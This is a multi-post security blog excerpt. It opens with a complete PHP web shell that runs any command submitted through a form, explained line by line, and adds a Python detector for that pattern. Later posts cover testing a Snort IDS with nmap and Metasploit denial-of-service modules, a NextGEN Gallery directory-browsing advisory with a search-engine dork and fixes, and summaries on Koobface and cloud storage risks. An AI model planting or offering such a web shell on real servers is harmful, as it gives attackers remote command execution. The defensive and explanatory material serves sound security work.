Simple PHP Shell Script

Here is a simple PHP shell script which took less than 10 minutes to write. This tiny script lets you execute arbitrary shell commands or browse the filesystem on a remote Linux server.

<HTML>
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
<BODY>
<form action="shell.php" method=post>
<input type="text" NAME="c"/>
<input name="submit" type=submit value="Command">
</FORM>
<?php
if(isset($_REQUEST['submit']))
{
$c = $_REQUEST['c'];
$output = shell_exec("$c");
echo "<pre>$output</pre>\n";
}
?>
</BODY>
</HTML>

The script has two parts: HTML and PHP.

HTML

1. This is the start of HTML code.
<HTML>
2. Create a HEAD section for the HTML page and declare “Simple PHP Shell” as its title.
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
3. Create BODY section for the HTML page.
<BODY>
4. Create a form which calls shell.php. Please note, this assumes that this script is saved as shell.php.
<form action="shell.php" method=post>
5. Create a text input field with the name of "c".
<input type="text" NAME="c"/>
6. Create a button with the name of "submit" and the label "Command".
<input type=submit name="submit" value="Command">
7. Close the form.
</FORM>

PHP

1. The PHP code is embedded in the HTML code and the start is marked by
<?php

2. Check if the form has been submitted. If the request variable 'submit' exists ($_REQUEST holds GET, POST and cookie data), the user has clicked the "Command" button. If not, do nothing.
if(isset($_REQUEST['submit']))
3. Declare "$c" as a variable and set it to the contents of the input field 'c' from the HTML form.
$c = $_REQUEST['c'];
4. Declare "$output" as a variable to hold the return value from the shell_exec() function. "$c" is the command that the user entered in the input field.
$output = shell_exec("$c");
5. Show the result.
echo "<pre>$output</pre>\n";
6. Declare the end for the PHP code.
?>

Closing the HTML

1. Close the BODY section.
</BODY>
2. Declare the end for the HTML code.
</HTML>
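The same pattern is what a defender looks for when hunting web shells in a PHP tree: request data flowing straight into a command-execution call. As an added example (not part of the original post), here is a small Python check that flags that flow; it reports line 5 of the script above and ignores a script that runs a fixed command. The function names, the list of sinks and the two extra sample scripts are mine.

```python
import re

# Command-execution sinks that a web shell hands user input to.
COMMAND_SINKS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)"
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(" + SUPERGLOBAL + r")\s*\[")
SINK_CALL = re.compile(r"\b(" + "|".join(COMMAND_SINKS) + r")\s*\((.*)\)")

def find_command_injection(php_source):
    """Return (line, sink, source) for each call where request data reaches a command sink.

    Per line, in order: record variables assigned straight from a request superglobal
    (e.g. $c = $_REQUEST['c'];), then flag any sink call whose argument list names such
    a variable or a superglobal directly. Line-based taint tracking, not a PHP parser.
    """
    tainted = {}   # variable name -> superglobal it was copied from
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for var, source in ASSIGN.findall(line):
            tainted[var] = source
        for sink, args in SINK_CALL.findall(line):
            direct = re.search(SUPERGLOBAL, args)
            if direct:
                findings.append((lineno, sink, direct.group(0)))
                continue
            for var, source in tainted.items():
                if re.search(re.escape(var) + r"\b", args):
                    findings.append((lineno, sink, source))
                    break
    return findings

# The PHP part of the script above (ASCII quotes), a direct-sink variant (constructed)
# and a benign script that runs a fixed command (constructed).
WEB_SHELL = r"""<?php
if(isset($_REQUEST['submit']))
{
$c = $_REQUEST['c'];
$output = shell_exec("$c");
echo "<pre>$output</pre>\n";
}
?>"""
DIRECT_SINK = r"""<?php system($_GET['cmd']); ?>"""
BENIGN = r"""<?php
$load = shell_exec("uptime");
echo "<pre>$load</pre>";
?>"""

if __name__ == "__main__":
    for name, src in (("WEB_SHELL", WEB_SHELL), ("DIRECT_SINK", DIRECT_SINK), ("BENIGN", BENIGN)):
        print(name, find_command_injection(src) or "clean")
```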

MasterCard Australia: Untrusted SSL Certificate

I am not sure why we have something like PCI DSS when MasterCard, as a major payment processing company, is not using it.

I came across an untrusted digital certificate for MasterCard Australia while I was trying to pay my insurance premium to the UAE branch of Metlife / Alico.

Here is a screen shot and exported certificate.

UPDATE: The issue has been resolved by MasterCard.


How to Test Snort with Penetration Testing Tools

Recently, I deployed Snort on a cloud-based network to act as an Intrusion Detection System (IDS). Installing and compiling Snort on a cloud server running CentOS 5.7 is an adventure on its own! But testing it properly was my main challenge.

The project’s team leader decided to use Snort IDS after my recommendation. Using Snort allowed the project to comply with the client’s security baseline and save $800/month by not using the IDS solution offered by the hosting company.

The only way that I could test the Snort installation's functionality and configuration was through real-world attack simulations. I tried to simulate attacks by using penetration testing tools.

First Test – Port Scanning

Most of the time, penetration testing starts with a port scan, which lets the tester probe the target to discover open ports and running services and to fingerprint the operating system. To do this I used nmap.

When I ran nmap, the Snort box detected the port scan. In addition to a TCP port scan, I used nmap to run a UDP port scan to see how well Snort reacted; the Snort installation detected the UDP port scan without problem.

Second Test – Attack on the Apache Server

I decided to take my Snort test to a higher level by using Metasploit to launch some actual attacks to see if Snort would be able to detect the attacks.

The first attack I used from Metasploit was the Apache Range DoS attack (auxiliary/dos/http/apache_range_dos), known as Apache Killer. I knew the Apache version installed was not vulnerable, but I just wanted to see if Snort was able to detect the attack. Snort detected this attack and logged it as an alert. Then, I used Metasploit's attack against the mod_isapi extension in Apache (auxiliary/dos/http/apache_mod_isapi). Snort detected this and logged it without problem.

Third Test – Protocol Anomaly

I played with SSH, establishing SSH connections to unconventional ports to check whether Snort was able to detect SSH protocol anomalies. After a bit of trial and error, Snort detected the SSH port mismatches and logged the issue as an alert.

Fourth Test – Web Application Fuzzer

I used Webshag as a web application fuzzer (a tool designed to send random data to a web application) to see if Snort would be able to detect the attack. Within a few seconds of launching the attack, Snort started to log Webshag requests and issue alerts for them. However, at that point Snort was not able to clearly identify the type of suspicious traffic or attack; it just issued thousands of alerts without any further information about the type or nature of the attack. Still, this was sufficient for our needs.

Using the above tests, I was confident that Snort was installed and configured correctly.
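To confirm that each of the tests above actually produced an alert, the alert file is the place to look. The following is an added example, not code from the original post: a parser for Snort's alert_fast output that counts alerts per signature and filters by the host the tests were launched from. The sample alert lines are constructed (sids 1000001 to 1000003 are local-rule placeholders; 122:1 is Snort's own sfportscan "TCP Portscan" event; addresses are documentation ranges) and the function names are mine.

```python
import re
from collections import Counter

# Snort "alert_fast" layout: timestamp, [gid:sid:rev], message, optional
# classification, priority, {protocol}, then source -> destination (ports optional).
FAST_ALERT = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r"(?:\s+\[Classification:\s+(?P<cls>[^\]]+)\])?"
    r"\s+\[Priority:\s+(?P<prio>\d+)\]\s+\{(?P<proto>[\w:]+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Constructed sample of an alert file after the four tests (port scan, Apache DoS,
# SSH on an odd port, web fuzzing) plus one junk line that must be ignored.
SAMPLE_ALERTS = """\
01/20-09:15:02.113245  [**] [122:1:1] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} 203.0.113.5 -> 198.51.100.10
01/20-09:15:09.771003  [**] [122:1:1] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} 203.0.113.5 -> 198.51.100.10
01/20-09:18:33.410077  [**] [1:1000001:1] LOCAL Apache Range header DoS attempt [**] [Classification: Attempted Denial of Service] [Priority: 2] {TCP} 203.0.113.5:47820 -> 198.51.100.10:80
01/20-09:21:40.551002  [**] [1:1000002:1] LOCAL SSH on non-standard port [**] [Priority: 2] {TCP} 203.0.113.5:50111 -> 198.51.100.10:8022
01/20-09:30:11.002341  [**] [1:1000003:2] LOCAL web fuzzing request [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 203.0.113.5:50900 -> 198.51.100.10:80
this line is not an alert and must be ignored
"""

def parse_fast_alerts(text):
    """Parse alert_fast lines into dicts; lines that do not match the layout are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_ALERT.match(line.strip())
        if m:
            alerts.append(m.groupdict())
    return alerts

def summarise(alerts):
    """Count alerts per (gid:sid, message), so each test can be checked for a matching hit."""
    return Counter((a["gid"] + ":" + a["sid"], a["msg"]) for a in alerts)

def alerts_from(alerts, src_ip):
    """Only the alerts whose source is the host the tests were launched from."""
    return [a for a in alerts if a["src"] == src_ip]

if __name__ == "__main__":
    for (sig, msg), n in summarise(parse_fast_alerts(SAMPLE_ALERTS)).items():
        print(f"{n:6d}  {sig:12s}  {msg}")
```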

WordPress NextGEN Gallery Plugin; Directory Browsing Vulnerability

I came across this vulnerability at the weekend. The vulnerability has been reported to US-CERT and the author of the plugin.

Overview:
NextGEN Gallery plugin for WordPress allows remote directory browsing and unauthorized access to the gallery contents.

Description:
NextGEN Gallery plugin for WordPress does not prevent directory browsing and allows remote attackers to access the galleries and image files directly via HTTP requests. This issue may lead to unauthorized access to private images or galleries that were not intended to be public on the WordPress site/blog.

Exploit Syntax:
The image galleries can be accessed directly via HTTP request: http://www.website.com/wp-content/gallery/

Search engines such as Google can help attackers locate vulnerable websites by searching for the following phrase:

inurl:"/wp-content/gallery/"

Currently, Google returns more than 6 million websites in its search result for the above search phrase.

Impacts:

  1. Unauthorized access to data and files.
  2. Privacy issues due to search engine indexing and archiving.

Solutions:

  1. Add the following lines to WordPress .htaccess to prevent directory browsing:
    # Disable Directory Browsing
    Options All -Indexes
  2. Create an empty file named index.html or index.php and save it in the gallery directory (http://www.website.com/wp-content/gallery/ by default, or wherever your gallery folder is).
  3. Use Disable Directory Listings plugin, http://wordpress.org/extend/plugins/disable-directory-listings/ (This solution has been provided by NextGEN Gallery author).
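Added example, not part of the advisory: a self-check a site owner can run against their own WordPress install to confirm that one of the fixes above is in effect. It requests the gallery path named above and classifies the response (403 from Options -Indexes, an autoindex listing page, or a plain 200 from an empty index file). The sample response bodies are constructed and the function names are mine.

```python
import re
import urllib.request
from urllib.error import HTTPError, URLError

GALLERY_PATH = "/wp-content/gallery/"   # the path from the advisory
AUTOINDEX_TITLE = re.compile(r"<title>\s*Index of\b", re.I)  # Apache/nginx listing page

def classify_listing(status, body):
    """Map one response for the gallery directory to a verdict.

    403 is what "Options -Indexes" produces; 200 with an autoindex title means the
    listing is exposed; 200 without it means an index file (or another page) is served.
    """
    if status == 403:
        return "blocked"
    if status == 404:
        return "absent"
    if status == 200:
        return "listing" if AUTOINDEX_TITLE.search(body) else "no-listing"
    return "unknown"

def check_gallery(base_url, timeout=10):
    """Fetch the gallery directory of a site you administer and classify it (network call)."""
    req = urllib.request.Request(base_url.rstrip("/") + GALLERY_PATH,
                                 headers={"User-Agent": "gallery-self-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_listing(resp.status, resp.read().decode("utf-8", "replace"))
    except HTTPError as err:          # 403/404 arrive as exceptions in urllib
        return classify_listing(err.code, "")
    except URLError:
        return "unreachable"

# Constructed responses: an autoindex listing page and an empty index.html.
LISTING_PAGE = """<html><head><title>Index of /wp-content/gallery</title></head>
<body><h1>Index of /wp-content/gallery</h1>
<ul><li><a href="/wp-content/">Parent Directory</a></li>
<li><a href="holiday-2011/">holiday-2011/</a></li></ul></body></html>"""
EMPTY_INDEX = ""

if __name__ == "__main__":
    import sys
    print(check_gallery(sys.argv[1]) if len(sys.argv) > 1 else classify_listing(200, LISTING_PAGE))
```

A 200 response without the autoindex title is reported as no-listing, which also covers a catch-all or redirect page, so inspect the body if the verdict looks wrong.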

Vendor Information:

  1. http://WordPress.org/extend/plugins/nextgen-gallery/
  2. http://alexrabe.de/WordPress-plugins/nextgen-gallery/

Product Details:

  1. NextGEN Gallery
  2. Version: 1.9.2 – 1.9.3
  3. Last update: Jan 17, 2012

Update: This issue was not fixed in version 1.9.3.

Koobface Gangs Investigative Report

Sophos has published details, on its Naked Security blog, of an investigative report about the Koobface gang, who infected thousands of PCs with malware via Facebook and, according to the New York Times, made millions of dollars in doing so.

The investigation was carried out by Jan Drömer, an independent researcher, and Dirk Kollberg from SophosLabs between October 2009 and February 2010.

The report is informative and useful for those interested in cyber forensic investigation. The investigation started by identifying the command and control server; analysis of it then led to a script which contained the suspects' phone numbers! Additional information was also found from the various user names used on the server. The full evidence is now in the hands of law enforcement agencies.

Cloud Storage and its Security Implications

Instant messaging (IM) programs such as Yahoo Messenger, Google Talk and ICQ have been a challenge for IT security professionals for many years. Personally, I have dealt with IM and P2P file-sharing security issues in many different environments, from educational institutions to large corporations. I have tried to control them using different security appliances and solutions, including Microsoft ISA Server and Cisco PIX, along with security awareness and training for staff.

However, in terms of security issues, IM and P2P file-sharing programs are being superseded by cloud drive utilities such as Dropbox and CloudMe Easy Upload. Cloud storage is used to overcome email attachment limitations and to facilitate better file sharing, but this type of application introduces new problems for information security professionals.

Paul Asadoorian, on the Tenable Network Security blog, has written an interesting article about cloud storage security issues in corporate networks. He discusses the challenges and offers a solution: a new plugin for Tenable's Nessus vulnerability scanner which can detect Dropbox on Microsoft Windows and OS X.